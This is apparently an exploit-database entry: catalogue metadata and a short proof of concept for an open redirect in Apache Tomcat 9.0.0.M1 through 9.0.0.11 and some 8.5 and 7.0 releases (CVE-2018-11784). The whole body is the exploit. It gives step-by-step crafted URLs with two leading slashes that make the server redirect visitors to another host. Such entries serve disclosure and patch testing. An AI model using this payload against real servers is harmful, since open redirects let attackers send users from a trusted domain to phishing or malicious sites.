Apache Tomcat 9.0.0.M1 - Open Redirect

Author: Central InfoSec
type: webapps
platform: multiple
port: 
date_added: 2021-07-13 
date_updated: 2021-07-13 
verified: 0 
codes: CVE-2018-11784 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect
# Date: 10/04/2018
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90
# CVE : CVE-2018-11784

# Proof of Concept:

# Identify a subfolder within your application
http://example.com/test/

# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash
http://example.com//test

# Browse to the newly created URL and the application will perform a redirection
http://test/